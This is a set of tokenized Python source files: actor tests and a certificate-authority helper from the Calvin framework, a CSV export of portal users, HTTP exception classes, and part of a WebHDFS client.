id : [ ( node , "<STR_LIT:y>" ) ] } <EOL> } <EOL> def test_state ( actor ) : <EOL> inport = actor . inports [ '<STR_LIT>' ] <EOL> outport = actor . outports [ '<STR_LIT>' ] <EOL> correct_state = { <EOL> '<STR_LIT>' : set ( [ actor . id ] ) , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : actor . id , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:N>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : { inport . id : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : [ inport . id ] , <EOL> '<STR_LIT>' : { inport . id : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT:id>' : inport . id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' } } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : { '<STR_LIT:N>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT:id>' : outport . id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' } } } <EOL> test_state = actor . 
state ( ) <EOL> for k , v in correct_state . iteritems ( ) : <EOL> if isinstance ( v , set ) : <EOL> assert set ( test_state [ k ] ) == v <EOL> else : <EOL> assert test_state [ k ] == v <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] ) <EOL> def test_set_signature ( actor , prev_signature , new_signature , expected ) : <EOL> actor . signature_set ( prev_signature ) <EOL> actor . signature_set ( new_signature ) <EOL> assert actor . _signature == expected <EOL> def test_component ( actor ) : <EOL> actor . component_add ( <NUM_LIT:1> ) <EOL> assert <NUM_LIT:1> in actor . component_members ( ) <EOL> actor . component_add ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert <NUM_LIT:2> in actor . component_members ( ) <EOL> assert <NUM_LIT:3> in actor . component_members ( ) <EOL> actor . component_remove ( <NUM_LIT:1> ) <EOL> assert <NUM_LIT:1> not in actor . component_members ( ) <EOL> actor . component_remove ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert <NUM_LIT:2> not in actor . component_members ( ) <EOL> assert <NUM_LIT:3> not in actor . component_members ( ) <EOL> def test_requirements ( actor ) : <EOL> assert actor . requirements_get ( ) == [ ] <EOL> actor . requirements_add ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> actor . requirements_add ( [ <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> actor . requirements_add ( [ <NUM_LIT:6> , <NUM_LIT:7> ] , extend = True ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] </s>
<s> """<STR_LIT>""" <EOL> import ConfigParser <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> import tempfile <EOL> import time <EOL> import random <EOL> import shutil <EOL> from calvin . utilities import confsort <EOL> import OpenSSL <EOL> from calvin . utilities import calvinuuid <EOL> from calvin . utilities import calvinconfig <EOL> from calvin . utilities . calvinlogger import get_logger <EOL> from calvin . utilities . utils import get_home <EOL> _log = get_logger ( __name__ ) <EOL> _conf = calvinconfig . get ( ) <EOL> BEGIN_LINE = "<STR_LIT>" <EOL> class Config ( ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:none>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> def __init__ ( self , configfile = None , domain = None , commonName = None , force = False , readonly = False ) : <EOL> self . configfile = configfile <EOL> self . commonName = commonName or '<STR_LIT>' <EOL> self . config = ConfigParser . SafeConfigParser ( ) <EOL> self . config . optionxform = str <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> if configfile is not None : <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> elif configfile is None and domain is not None : <EOL> self . domain = domain <EOL> homefolder = get_home ( ) <EOL> self . configfile = os . path . join ( homefolder , "<STR_LIT>" , <EOL> "<STR_LIT>" , domain , <EOL> "<STR_LIT>" ) <EOL> exist = os . path . isfile ( self . configfile ) <EOL> if not exist and readonly : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if exist and not force : <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> print "<STR_LIT>" "<STR_LIT>" . format ( self . configfile ) <EOL> else : <EOL> self . new_opensslconf ( ) <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> print "<STR_LIT>" "<STR_LIT:{}>" . format ( self . configfile ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def new_opensslconf ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = os . path . dirname ( self . configfile ) <EOL> for section in self . __class__ . DEFAULT . keys ( ) : <EOL> self . config . add_section ( section ) <EOL> print "<STR_LIT>" . format ( section ) <EOL> for option in self . __class__ . DEFAULT [ section ] : <EOL> if option == "<STR_LIT>" : <EOL> value = self . 
domain <EOL> elif option == "<STR_LIT>" : <EOL> value = directory <EOL> elif section == '<STR_LIT>' and option == '<STR_LIT>' : <EOL> value = self . commonName <EOL> else : <EOL> value = self . __class__ . DEFAULT [ section ] [ option ] <EOL> self . config . set ( section , option , value ) <EOL> print "<STR_LIT>" . format ( option , value ) <EOL> try : <EOL> os . makedirs ( directory , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError , e : <EOL> print e <EOL> with open ( self . configfile , '<STR_LIT:wb>' ) as configfd : <EOL> self . config . write ( configfd ) <EOL> configfd . close ( ) <EOL> confsort . reorder ( self . configfile ) <EOL> def parse_opensslconf ( self ) : <EOL> """<STR_LIT>""" <EOL> self . config . read ( self . configfile ) <EOL> configuration = { } <EOL> for section in self . __class__ . DEFAULT . keys ( ) : <EOL> for option in self . __class__ . DEFAULT [ section ] . keys ( ) : <EOL> raw = self . config . get ( section , option ) <EOL> value = raw . split ( "<STR_LIT:#>" ) [ <NUM_LIT:0> ] . strip ( ) <EOL> if "<STR_LIT:$>" in value : <EOL> variable = "<STR_LIT>" . join ( value . split ( "<STR_LIT:$>" ) [ <NUM_LIT:1> : ] ) <EOL> variable = variable . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> path = "<STR_LIT:/>" + "<STR_LIT:/>" . join ( value . split ( "<STR_LIT:/>" ) [ <NUM_LIT:1> : ] ) <EOL> varvalue = self . config . get ( section , variable ) <EOL> value = varvalue . split ( "<STR_LIT:#>" ) [ <NUM_LIT:0> ] . strip ( ) + path <EOL> try : <EOL> configuration [ section ] . update ( { option : value } ) <EOL> except KeyError : <EOL> configuration [ section ] = { } <EOL> configuration [ section ] . update ( { option : value } ) <EOL> return configuration <EOL> def incr ( fname ) : <EOL> """<STR_LIT>""" <EOL> fhandle = open ( fname , '<STR_LIT>' ) <EOL> current = int ( fhandle . readline ( ) , <NUM_LIT:16> ) <EOL> print ( current ) <EOL> current = current + <NUM_LIT:1> <EOL> fhandle . seek ( <NUM_LIT:0> ) <EOL> fhandle . 
write ( str ( format ( current , '<STR_LIT:x>' ) ) ) <EOL> fhandle . truncate ( ) <EOL> fhandle . close ( ) <EOL> return current <EOL> def touch ( fname , times = None ) : <EOL> """<STR_LIT>""" <EOL> fhandle = open ( fname , '<STR_LIT:a>' ) <EOL> try : <EOL> os . utime ( fname , times ) <EOL> finally : <EOL> fhandle . close ( ) <EOL> def fingerprint ( filename ) : <EOL> """<STR_LIT>""" <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , filename , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> try : <EOL> fingerprint = stdout . split ( "<STR_LIT:=>" ) [ <NUM_LIT:1> ] . strip ( ) <EOL> except ( IndexError , AttributeError ) : <EOL> errormsg = "<STR_LIT>" "<STR_LIT>" . format ( stderr ) <EOL> raise IOError ( errormsg ) <EOL> return fingerprint <EOL> def new_runtime ( conf , name , nodeid = None ) : <EOL> """<STR_LIT>""" <EOL> outpath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> name_dir = os . path . join ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] , name ) <EOL> private_key = os . path . join ( name_dir , "<STR_LIT>" , "<STR_LIT>" ) <EOL> private = os . path . dirname ( private_key ) <EOL> out = os . path . join ( outpath , "<STR_LIT>" . format ( name ) ) <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> try : <EOL> os . makedirs ( outpath , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . makedirs ( private , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> organization = conf . domain <EOL> commonname = name <EOL> dnQualifier = "<STR_LIT>" if nodeid is None else nodeid <EOL> subject = "<STR_LIT>" . format ( organization , commonname , dnQualifier ) <EOL> log = subprocess . 
# --- Certificate-authority helpers: drive the openssl CLI via subprocess ---
# NOTE(review): this chunk begins mid-statement; the leading "Popen(" below is
# the tail of an assignment (presumably `log = subprocess.`) whose start lies
# before the visible range.  It is reproduced unchanged.
Popen(["<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
       "<STR_LIT>", "<STR_LIT>",
       "<STR_LIT>", private_key],
      stdout=subprocess.PIPE,
      stderr=subprocess.PIPE)
stdout, stderr = log.communicate()
# Convention used throughout this module: surface the tool's stderr as an
# IOError on any non-zero exit status.
if log.returncode != <NUM_LIT:0>:
    raise IOError(stderr)
# Second openssl invocation: presumably produces `out` from the private key
# and subject -- TODO confirm (command strings are sanitized placeholders).
log = subprocess.Popen(["<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
                        "<STR_LIT>", subject,
                        "<STR_LIT>", private_key,
                        "<STR_LIT>",
                        "<STR_LIT>",
                        "<STR_LIT>", out],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE)
stdout, stderr = log.communicate()
if log.returncode != <NUM_LIT:0>:
    raise IOError(stderr)
return out


def remove_domain(domain, directory=None):
    """<STR_LIT>"""
    # Resolve the domain's on-disk directory (defaulting under the user's
    # home folder) and delete the whole tree -- but only when its config
    # file exists, so an arbitrary directory is never removed by accident.
    homefolder = get_home()
    domaindir = directory or os.path.join(homefolder, "<STR_LIT>", "<STR_LIT>", domain)
    configfile = os.path.join(domaindir, "<STR_LIT>")
    if os.path.isfile(configfile):
        # Best-effort removal; missing files are not fatal.
        shutil.rmtree(domaindir, ignore_errors=True)


def new_domain(conf):
    """<STR_LIT>"""
    # Pull the CA directory layout out of the loaded configuration object.
    outpath = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    private = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    crlpath = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    private_key = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    out = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    password_file = os.path.join(private, "<STR_LIT>")
    # Restrictive umask so newly created CA material is not world-readable.
    # NOTE(review): the adjacent numeric placeholders below were originally
    # single octal constants (e.g. 0700) split by the corpus tokenizer.
    os.umask(<NUM_LIT> <NUM_LIT>)
    # Create the directory layout; an OSError (already exists) is fine.
    try:
        os.mkdir(crlpath, <NUM_LIT:0> <NUM_LIT>)
    except OSError:
        pass
    try:
        os.mkdir(outpath, <NUM_LIT:0> <NUM_LIT>)
    except OSError:
        pass
    try:
        os.mkdir(private, <NUM_LIT:0> <NUM_LIT>)
    except OSError:
        pass
    touch(conf.configuration["<STR_LIT>"]["<STR_LIT>"])
    # Seed the serial-number file that openssl uses when issuing certs.
    serialfd = open(conf.configuration["<STR_LIT>"]["<STR_LIT>"], '<STR_LIT:w>')
    serialfd.write("<STR_LIT>")
    serialfd.close()
    # Subject is derived entirely from the configured domain name.
    organization = conf.domain
    commonname = conf.domain
    subject = "<STR_LIT>".format(organization, commonname)
    # First openssl call: presumably generates the CA password material into
    # password_file -- TODO confirm (arguments are sanitized).
    log = subprocess.Popen(["<STR_LIT>", "<STR_LIT>",
                            "<STR_LIT>", password_file, "<STR_LIT>"],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
    stdout, stderr = log.communicate()
    if log.returncode != <NUM_LIT:0>:
        raise IOError(stderr)
    # Second openssl call: presumably creates the self-signed CA certificate
    # (`out`) and its private key using the domain-derived subject.
    log = subprocess.Popen(["<STR_LIT>", "<STR_LIT>",
                            "<STR_LIT>",
                            "<STR_LIT>", conf.configfile,
                            "<STR_LIT>",
                            "<STR_LIT>",
                            "<STR_LIT>", subject,
                            "<STR_LIT>",
                            "<STR_LIT>".format(password_file),
                            "<STR_LIT>", out,
                            "<STR_LIT>", private_key],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
    stdout, stderr = log.communicate()
    if log.returncode != <NUM_LIT:0>:
        raise IOError(stderr)
    return out


def copy_cert(conf, path):
    """<STR_LIT>"""
    cert_file = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    try:
        with open(cert_file, '<STR_LIT>') as f:
            cert_str = f.read()
        cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_str)
        # Hex subject-name hash -- OpenSSL's conventional c_rehash-style
        # filename stem for certificates.
        cert_hash = format(cert.subject_name_hash(), '<STR_LIT:x>')
    except:
        # NOTE(review): bare except hides the real failure; consider
        # narrowing the exception type and chaining the original error.
        _log.exception("<STR_LIT>")
        raise Exception("<STR_LIT>")
    out_file = os.path.join(path, cert_hash + "<STR_LIT>")
    shutil.copyfile(cert_file, out_file)
    return out_file


def sign_file(conf, file):
    """<STR_LIT>"""
    private = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    cert_file = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    private_key = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    password_file = os.path.join(private, "<STR_LIT>")
    try:
        with open(cert_file, '<STR_LIT>') as f:
            cert_str = f.read()
        cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_str)
        cert_hash = format(cert.subject_name_hash(), '<STR_LIT:x>')
    except:
        # NOTE(review): same bare-except pattern as copy_cert above.
        _log.exception("<STR_LIT>")
        raise Exception("<STR_LIT>")
    # The signature file sits next to the input, suffixed with the cert hash.
    sign_file = file + "<STR_LIT>" + cert_hash
    log = subprocess.Popen(["<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
                            "<STR_LIT>", private_key,
                            "<STR_LIT>", "<STR_LIT>" + password_file,
                            "<STR_LIT>", sign_file,
                            file],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
    stdout, stderr = log.communicate()
    if log.returncode != <NUM_LIT:0>:
        raise IOError(stderr)
    return sign_file


def sign_req(conf, req, name):
    """<STR_LIT>"""
    private = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    requestpath = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    certspath = conf.configuration["<STR_LIT>"]["<STR_LIT>"]
    name_dir = os.path.join(conf.configuration["<STR_LIT>"]["<STR_LIT>"], name)
    password_file = os.path.join(private, "<STR_LIT>")
    signed = os.path.join(certspath, "<STR_LIT>")
    request = os.path.join(requestpath, req)
    os.umask(<NUM_LIT> <NUM_LIT>)
    try:
        os.mkdir(private, <NUM_LIT:0> <NUM_LIT>)
    except OSError:
        pass
    try:
        os.mkdir(certspath, <NUM_LIT:0> <NUM_LIT>)
    except OSError:
        pass
    # Serialize concurrent signers with an O_CREAT|O_EXCL lock file; spin
    # with a short random sleep until this process wins the race.
    fname_lock = "<STR_LIT>".format(conf.configuration["<STR_LIT>"]["<STR_LIT>"])
    fdlock = None
    try:
        while True:
            try:
                fdlock = os.open(fname_lock, os.O_CREAT | os.O_EXCL | os.O_RDWR)
            except OSError:
                time.sleep(random.random() * <NUM_LIT>)
                continue
            break
        # Bump the CA serial while holding the lock, then run openssl to
        # sign the CSR.  The string fed to stdin presumably answers the
        # tool's interactive confirmation prompts -- TODO confirm.
        serial = incr(conf.configuration["<STR_LIT>"]["<STR_LIT>"])
        log = subprocess.Popen(["<STR_LIT>", "<STR_LIT>",
                                "<STR_LIT>", request,
                                "<STR_LIT>",
                                "<STR_LIT>", conf.configfile,
                                "<STR_LIT>", signed,
                                "<STR_LIT>", "<STR_LIT>" + password_file],
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
        log.stdin.write("<STR_LIT>")
        stdout, stderr = log.communicate("<STR_LIT>")
        if log.returncode != <NUM_LIT:0>:
            raise IOError(stderr)
        # The final filename is derived from the tail of the certificate
        # fingerprint (colons stripped).
        fp = fingerprint(signed)
        newcert = "<STR_LIT>".format(fp.replace("<STR_LIT::>", "<STR_LIT>")[-<NUM_LIT>:])
    except:
        # NOTE(review): swallowing every error here means `newcert` may be
        # unbound below (NameError at os.path.join) and the real signing
        # failure is silently lost.
        pass
    finally:
        # Always release the lock file, best effort.
        if fdlock:
            try:
                os.close(fdlock)
                os.remove(fname_lock)
            except:
                pass
    try:
        os.makedirs(os.path.join(name_dir, "<STR_LIT>"))
    except OSError:
        pass
    try:
        os.makedirs(os.path.join(name_dir, "<STR_LIT>"))
    except OSError:
        pass
    # Move the freshly signed certificate into the runtime's own directory.
    newkeyname = os.path.join(name_dir, "<STR_LIT>", newcert)
    print(signed)
    print(newkeyname)
    os.rename(signed, newkeyname)
    return newkeyname


def obtain_cert_node_info(name):
    """<STR_LIT>"""
    cert_conffile = _conf.get("<STR_LIT>", "<STR_LIT>")
    domain = _conf.get("<STR_LIT>", "<STR_LIT>")
    # Without both a security domain and a name there is nothing to look
    # up; return a fresh uuid with no domain attached.
    if domain is None or name is None:
        _log.debug("<STR_LIT>".format(domain, name))
        return {'<STR_LIT>': None, '<STR_LIT:name>': name, '<STR_LIT:id>': calvinuuid.uuid("<STR_LIT>")}
    cert_conf = Config(cert_conffile, domain)
    name_dir = os.path.join(cert_conf.configuration["<STR_LIT>"]["<STR_LIT>"], name)
    # 1) Reuse an existing certificate when its subject matches this
    #    name/domain; the bare `raise` jumps to the fall-through below.
    try:
        filenames = os.listdir(os.path.join(name_dir, "<STR_LIT>"))
        content = open(os.path.join(name_dir, "<STR_LIT>", filenames[<NUM_LIT:0>]), '<STR_LIT>').read()
        cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM,
                                               content)
        subject = cert.get_subject()
        if subject.commonName != name or subject.organizationName != domain:
            raise
        _log.debug("<STR_LIT>".format(domain, name))
        return {'<STR_LIT>': domain, '<STR_LIT:name>': name, '<STR_LIT:id>': subject.dnQualifier}
    except:
        # No usable cert on disk -- fall through to creating a new one.
        pass
    # 2) Generate a CSR for a new runtime and sign it with the local CA.
    csrfile = new_runtime(cert_conf, name, nodeid=calvinuuid.uuid("<STR_LIT>"))
    _log.debug("<STR_LIT>".format(csrfile, domain, name))
    try:
        content = open(csrfile, '<STR_LIT>').read()
        cert = OpenSSL.crypto.load_certificate_request(OpenSSL.crypto.FILETYPE_PEM,
                                                       content)
        subject = cert.get_subject()
        sign_req(cert_conf, os.path.basename(csrfile), name)
        _log.debug("<STR_LIT>".format(domain, name))
        return {'<STR_LIT>': domain, '<STR_LIT:name>': name, '<STR_LIT:id>': subject.dnQualifier}
    except:
        # Last resort: anonymous id outside any certificate domain.
        return {'<STR_LIT>': None, '<STR_LIT:name>': name, '<STR_LIT:id>': calvinuuid.uuid("<STR_LIT>")}
# Flat script: export every portal user to a CSV report.
# Python 2 style throughout (csv opened in 'wb', .encode on text fields).
import csv, time
from agoTools.admin import Admin

agoAdmin = Admin('<STR_LIT>')
users = agoAdmin.getUsers()
roles = agoAdmin.getRoles()
# Map role id -> human-readable role name for the report.
roleLookup = {}
for role in roles:
    roleLookup[role["<STR_LIT:id>"]] = role["<STR_LIT:name>"]
outputFile = '<STR_LIT>'
with open(outputFile, '<STR_LIT:wb>') as output:
    dataWriter = csv.writer(output, delimiter='<STR_LIT:U+002C>', quotechar='<STR_LIT:|>', quoting=csv.QUOTE_MINIMAL)
    # Header row.
    dataWriter.writerow(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
    for user in users:
        roleID = user['<STR_LIT>']
        # Fall back to the raw role id when it is not in the lookup
        # (e.g. built-in roles not returned by getRoles).
        roleName = roleLookup.get(roleID, roleID)
        # The division by 1000 suggests the timestamp field is in
        # milliseconds since the epoch -- TODO confirm against the API.
        dataWriter.writerow([user['<STR_LIT>'].encode('<STR_LIT:utf-8>'), user['<STR_LIT:email>'].encode('<STR_LIT:utf-8>'), user['<STR_LIT:username>'].encode('<STR_LIT:utf-8>'), roleName, time.strftime("<STR_LIT>", time.gmtime(user['<STR_LIT>'] / <NUM_LIT:1000>)), "<STR_LIT:U+002C>".join(user['<STR_LIT>'])])
<s> """<STR_LIT>""" <EOL> class RequestException ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class HTTPError ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> response = None <EOL> class ConnectionError ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class SSLError ( ConnectionError ) : <EOL> """<STR_LIT>""" <EOL> class Timeout ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class URLRequired ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class TooManyRedirects ( RequestException ) : <EOL> """<STR_LIT>""" <EOL> class MissingSchema ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" <EOL> class InvalidSchema ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" <EOL> class InvalidURL ( RequestException , ValueError ) : <EOL> """<STR_LIT>""" </s>
# WebHDFS REST client module.
# Python 2 throughout: httplib/urlparse imports and a `print` statement in
# the __main__ demo at the bottom.
import sys, os
import stat
import httplib
import urlparse
import json
import logging

__all__ = [
    "<STR_LIT>",
    "<STR_LIT>"
]

logging.basicConfig(level=logging.DEBUG, datefmt='<STR_LIT>',
                    format='<STR_LIT>')
logger = logging.getLogger(name='<STR_LIT>')

# Common URL prefix for all WebHDFS REST calls (conventionally
# "/webhdfs/v1" -- sanitized here).
WEBHDFS_CONTEXT_ROOT = "<STR_LIT>"


class WebHDFS(object):
    """<STR_LIT>"""

    def __init__(self, namenode_host, namenode_port, hdfs_username):
        # All requests are issued on behalf of `hdfs_username` via a query
        # parameter appended to every URL.
        self.namenode_host = namenode_host
        self.namenode_port = namenode_port
        self.username = hdfs_username

    def mkDir(self, path):
        # Single round-trip directory creation against the namenode.
        url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self.username
        logger.debug("<STR_LIT>" + url_path)
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason))
        httpClient.close()
        CheckResponseError(response)

    def delete(self, path, recursive=False):
        # DELETE with the recursive flag rendered as 'true'/'false'.
        url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + ('<STR_LIT:true>' if recursive else '<STR_LIT:false>') + '<STR_LIT>' + self.username
        logger.debug("<STR_LIT>" + url_path)
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason))
        httpClient.close()
        CheckResponseError(response)

    def rmDir(self, path):
        # Convenience wrapper: recursive delete of a directory tree.
        self.delete(path, recursive=True)

    def copyToHDFS(self, source_path, target_path, replication=<NUM_LIT:1>, overwrite=False):
        # Two-step WebHDFS upload: the namenode answers with a redirect
        # naming the datanode, which then receives the actual file body.
        url_path = WEBHDFS_CONTEXT_ROOT + target_path + '<STR_LIT>' + ('<STR_LIT:true>' if overwrite else '<STR_LIT:false>') + '<STR_LIT>' + str(replication) + '<STR_LIT>' + self.username
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason, response.msg))
        redirect_location = response.msg["<STR_LIT:location>"]
        logger.debug("<STR_LIT>" % (redirect_location))
        # Split host:port out of the redirect target by hand.
        result = urlparse.urlparse(redirect_location)
        redirect_host = result.netloc[:result.netloc.index("<STR_LIT::>")]
        redirect_port = result.netloc[(result.netloc.index("<STR_LIT::>") + <NUM_LIT:1>):]
        redirect_path = result.path + "<STR_LIT:?>" + result.query
        logger.debug("<STR_LIT>" % (redirect_host, redirect_port, redirect_path))
        fileUploadClient = httplib.HTTPConnection(redirect_host,
                                                  redirect_port, timeout=<NUM_LIT>)
        # NOTE(review): the source file handle passed as the request body
        # is never explicitly closed.
        fileUploadClient.request('<STR_LIT>', redirect_path, open(source_path, "<STR_LIT:rb>"), headers={})
        response = fileUploadClient.getresponse()
